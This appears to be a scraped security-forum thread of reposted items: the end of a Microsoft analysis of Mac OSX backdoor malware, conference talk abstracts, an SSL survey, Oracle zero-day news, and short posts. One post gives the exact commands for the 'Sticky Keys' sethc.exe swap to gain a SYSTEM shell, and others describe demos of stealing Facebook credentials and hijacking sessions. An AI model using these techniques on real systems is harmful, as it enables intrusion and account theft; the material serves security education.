This stage 1 shellcode leads to stage 2 shellcode, which is located in memory. The stage 2 shellcode is actually where the infection of the system occurs. The stage 2 shellcode creates three files: /tmp/launch-hs, /tmp/launch-hse, /tmp/file.doc

Figure 3 - File Creation by Stage 2 Shellcode

As you can see from the above picture, the exploit attack code uses typical Unix style shellcode to run system calls. So far, this is nothing new. Later in the shellcode, the file "/tmp/launch-hs" is executed by a system call to "execve" to execute commands. The contents of "/tmp/launch-hs" should be a shell script or executable.

Figure 4 - Execution of /tmp/launch-hs script file

We looked into the contents of "/tmp/launch-hs", and it appears like the following:

Figure 5 - /tmp/launch-hs script contents

It is just a tiny shell script that runs "/tmp/launch-hse" and opens "/tmp/file.doc". The file "/tmp/launch-hse" should be the main binary that contains all the malicious code. Also, "/tmp/file.doc" is a fake document file that will be displayed to the user to keep the user from seeing any abnormalities or malicious symptoms. The main payload file is "/tmp/launch-hse" - it is in Mach-O format, the standard executable format for Mac OSX. This binary is a command and control (C&C) agent that communicates with a C&C server (master) to perform unauthorized actions that are similar to other C&C bot clients. The function names give clues that might indicate that this binary connects to a C&C server, parses commands from it, and performs file retrieval or creates processes.

Figure 6 - A peek into the function names gives you an idea.

The main difference about this malware is that it is written for Mac OSX. For example, if you look into the "RunFile" function, which runs a command on the infected machine, you can see that it's a Mac OSX version of a backdoor. Basically it runs a command supplied from the C&C server.

Figure 7 - RunFile function

In conclusion, we can see that Mac OSX is not safe from malware. Statistically speaking, as this operating system gains in consumer usage, attacks on the platform will increase. Exploiting Mac OSX is not much different from other operating systems. Even though Mac OSX has introduced many mitigation technologies to reduce risk, your protection against security vulnerabilities has a direct correlation with updating installed applications. If you're using Microsoft Office 2004 for Mac, Microsoft Office 2008 for Mac or Open XML File Format Converter for Mac, be sure to update using the latest product updates. For this specific vulnerability, you can visit the Microsoft Security Bulletin MS09-027 page and download the update.

Jeong Wook (Matt) Oh MMPC

Sursa: An interesting case of Mac OSX malware - Microsoft Malware Protection Center - Site Home - TechNet Blogs
  15. SIP home gateways under fire

The SIP home gateway -- which combines a NAT router, a SIP proxy, and analogue phone adapters -- is the weakest link in a Voice over IP network. SIP's numerous source routing mechanisms share the well-known security weaknesses of IP source routing. The talk discusses possible exploits and countermeasures.

Telephony is steadily moving to Voice over IP, opening up a world of hacking opportunities. While many security issues have long been addressed in standardization, real-world VoIP suffers from incomplete and sometimes broken implementations. SIP home gateways -- which combine a NAT router, a SIP proxy, and a phone adapter -- are especially at risk. The predominant VoIP protocol SIP (Session Initiation Protocol) has been designed as an -- almost -- stateless protocol. The network elements responsible for call routing only keep very little and short-lived state. This makes SIP highly scalable and substantially simplifies fail-over. To achieve this, SIP uses source routing mechanisms extensively. Due to its security weaknesses, the network layer protocols have long abandoned the idea of source routing, despite its theoretical appeal. Some IP source routing attacks and countermeasures can be applied to SIP.

[TABLE=class: datatable]
[TR] [TD=class: highlight]Authors[/TD] [TD=class: lowlight]Wolfgang Beck[/TD] [/TR]
[TR] [TD=class: highlight]Submitted[/TD] [TD=class: lowlight]May 01, 2012[/TD] [/TR]
[/TABLE]

Download: http://mirror.fem-net.de/CCC/27C3/mp3-audio-only/27c3-4181-en-sip_home_gateways_under_fire.mp3

Sursa: IT Security and Hacking knowledge base - SecDocs
  16. Terrorists Win - Exploiting Telecommunications Data Retention

Telecommunications data retention (TDR) has become a reality in most Western countries. Protagonists claim that the collection of massive amounts of data on the communication behavior of all individuals within a country would enable law enforcement agencies to exploit patterns in the stored data to uncover connections between suspects. While this is obviously true for investigations after an incident happened, there is up to now no critical and sound assessment publicly available that evaluates whether TDR brings any pro-active benefits for the above mentioned, justified purposes.

In this talk we give for the first time a critical assessment of the power of TDR based on methods from information theory. To this end we have employed agent based simulations, which mimic the communication behavior of a large community including a dark-net of alleged suspects. The structure and statistics of our telecommunication simulation, which drive the dynamics of telephone calls and simulated TDR data, were generated according to known statistics of real-world telecommunications networks.

Hiding in the unavoidable noise seems to be a passive strategy for terrorists to circumvent pro-active detection. This stems from a "needle in the haystack" problem that arises due to the small number of conspirators compared to the number of other participants. In particular situations and with adapted strategies, suspected terrorists might be able to eventually exploit TDR for their purposes and take an active approach to hiding in the crowd. Such TDR exploits would lower the probability of detection by law enforcement agencies and render TDR a potential security threat. Again, we use our simulations and our analysis procedure to assess this problem.

Authors: Kay Hamacher, Stefan Katzenbeisser
Submitted: May 01, 2012

Download: http://mirror.fem-net.de/CCC/27C3/mp4-h264-HQ/27c3-4055-en-terrorists_win_exploiting_telecommunications_data.mp4

Sursa: IT Security and Hacking knowledge base - SecDocs
  17. Windows 8 Forensic Guide Download: http://propellerheadforensics.files.wordpress.com/2012/04/thomson_windows-8-forensic-guide.pdf
  18. [h=1]SyScan 2012 Singapore[/h]
Parent Directory
Day1-1 Chris Valasek & Tarjei Mandt/
Day1-2 Loukas Kalenderidis/
Day1-3 Ryan MacArhur & Beist/
Day1-4 Aaron LeMasters/
Day1-5 James Burton/
Day1-6 Jon Oberheide/
Day2-10 Edgar Barbosa/
Day2-6 Alex Ionescu/
Day2-7 Stefan Esser/
Day2-8 Brett Moore/
Day2-9 Paul Craig/
Slides: http://www.xchg.info/ARTeam/conferences/SyScan%202012%20Singapore/
  19. [h=1]Skype-iplookup[/h] Performs an obscure IP lookup for online Skype accounts. Can find local and remote IP addresses. Requires a cracked SkypeKit with deobfuscated debug logs. Online: http://skype-ip-finder.tk/ Source code: https://github.com/zhovner/Skype-iplookup
  20. [h=3]Announcing SSL Pulse[/h] [h=2]April 30, 2012[/h]

Last week we announced SSL Pulse, a continuously updated dashboard that is designed to show the state of the SSL ecosystem at a glance. While it is possible today to deploy SSL and to deploy it well, the process is difficult: the default settings are wrong, the documentation is lacking, and the diagnostic tools are inadequate. For these reasons, we cannot say that the Web is yet secure, but we hope that someday it will be. The purpose of SSL Pulse is to bring visibility to SSL implementation issues on the Web, and while businesses are starting to fix these issues we can keep track of progress made towards making SSL more robust and widely adopted on the Internet.

SSL Pulse is based on the assessment technology and testing conducted by SSL Labs. The underlying data set draws from the information on about 200,000 SSL web sites that represent the most popular web sites in the world. We cherry-picked only the most important data points, focusing especially on those aspects where improvements are needed. We have so far conducted only one round of testing, but, when the next month’s results become available, we will start to show historic values and hopefully see improvements for each data point.

So what do the results tell us? Looking at the SSL Labs grades, which are designed to sum up the quality of SSL configuration, we can see that about 50% (99,903 sites) got an A, which is a good result. Previous global SSL Labs surveys reported about 33% well-configured sites, which means that more popular sites are better configured. Unfortunately, many of these A-grade sites (still) support insecure renegotiation (8,522 sites, or 8.5% of the well-configured ones) or are vulnerable to the BEAST attack (72,357 sites, or 72.4% of the well-configured ones). This leaves us with only 19,024 sites (or 9.59% of all sites) that are genuinely secure at this level of analysis.

The number of sites vulnerable to insecure renegotiation is decreasing at a steady pace, as patches are applied or servers get replaced. The very high number of sites vulnerable to the BEAST attack is worrying, because this problem needs to be addressed in configuration, and that requires awareness, time, and knowledge. Plus, freshly installed systems are equally likely to be vulnerable because of the insecure defaults. Among other interesting data points, we found only 19 weak private keys in our data. There are also 9 keys that trigger our black list of weak Debian keys. The support for HTTP Strict Transport Security, which is the state of the art configuration for SSL, is at 0.85% (1,697 sites).

As part of this effort, we also published an SSL/TLS Deployment Best Practices guide with clear and concise instructions to help overworked administrators and programmers spend the minimum time possible to deploy a secure site or web application.

Posted by Ivan Ristić at 16:36:44 in SSL, TIM

Sursa: Ivan Ristić: Announcing SSL Pulse
  21. [h=1]Oracle discloses new zero day exploit and launches JDK for OS X[/h] by Chester Wisniewski on May 1, 2012

While some might find it amusing that a company accidentally disclosed a zero day vulnerability in its own software, you won't if you are an Oracle database administrator. Earlier this month Oracle released a "critical patch update" fixing 88 vulnerabilities in its wide assortment of database products. Unfortunately one of the fixes for its TNS Listener service had stability issues and is only going to be fixed in future versions. Still Oracle saw fit to say it was fixed, even though they have no intention of releasing a patch for it and all current versions remain vulnerable.

This sounds bad enough, but it gets worse. Joxean Koret, who discovered and disclosed the vulnerability to Oracle in 2008, saw the notice that the flaw was fixed and published a proof-of-concept exploit to the Full Disclosure mailing list. Oracle isn't exactly known for getting security right, but this is downright reckless. Taking four years to fix a serious vulnerability, and even then only committing that future releases, to be named, will fix it? If you are responsible for securing Oracle DBs I would highly recommend creating extremely restrictive firewall rules for the TNS Listener service, or disabling it entirely if it isn't needed in your environment.

In other Oracle news, the Java JDK is now available for OS X Lion (10.7). For Java neophytes, this is not the Java Plugin/Java Web Start components that integrate with your browser to allow you to launch Java applets. It only works with 64 bit versions of Lion and is intended for development use. Earlier versions of OS X will not see a port coming from Oracle either. This might be an indication that Oracle intends to supply their own JRE/Java Plugin/Web Start for Mac users in the future, which would make it easier for OS X users to stay current without relying on Apple.

Update: At approximately the same time as this article was posted Oracle released a critical update for versions 10g and 11g database products fixing this vulnerability. Sometimes light is the best disinfectant.

Sursa: Oracle discloses new zero day exploit and launches JDK for OS X | Naked Security
  22. [h=3]Privilege Escalation via "Sticky" Keys[/h] [h=2]Monday, April 30, 2012[/h]

This has been documented all over, but I like things to be on the blog so I can find them... You can gain a SYSTEM shell on a machine you have administrative access on, or if you have physical access to the box and can boot to a repair disk or Linux distro and can change files.

Make a copy somewhere of the original sethc.exe on the system:

copy c:\windows\system32\sethc.exe c:\
cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe

Copy cmd.exe into sethc.exe's place:

copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
or
cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe

Reboot, hit the Shift key 5 times, a SYSTEM shell will pop up, do your thing. It would probably be nice to put sethc.exe back when you are done.

Posted by CG at 12:10 PM

Sursa: Carnal0wnage & Attack Research Blog: Privilege Escalation via "Sticky" Keys
  23. [h=4]Arp/Dns Spoofing Steal Facebook Password (Lan Environment)[/h] Description: In this video I'll show you how an attacker can steal user credentials of every site (in this case it will be Facebook) in a LAN environment. First of all we use SET to clone the current Facebook home page and ... Security Obscurity Blog: ARP/DNS Spoofing Steal Facebook Password (LAN Environment) Follow Me: https://twitter.com/#!/SecObscurity Sursa: Arp/Dns Spoofing Steal Facebook Password (Lan Environment)
  24. [h=4]Stealing Http Sessions With Sessionlist[/h] Description: I run through a quick demo of how to use sessionlist to sniff HTTP session traffic. Following that I use a simple Firefox plugin to spoof the data acquired to show full access to the logged-in user. Target demo site is facebook.com Download:
  25. [h=4]Ms12-020 -- Critical Vulnerability To Attack On Windows 2008 Enterprise Edition.[/h] Description: The vulnerability in Microsoft's Remote Desktop Protocol (RDP) implementation (MS12-020). Victim :- windows server 2006 x86 Enterprise Edition Sursa: Ms12-020 -- Critical Vulnerability To Attack On Windows 2008 Enterprise Edition.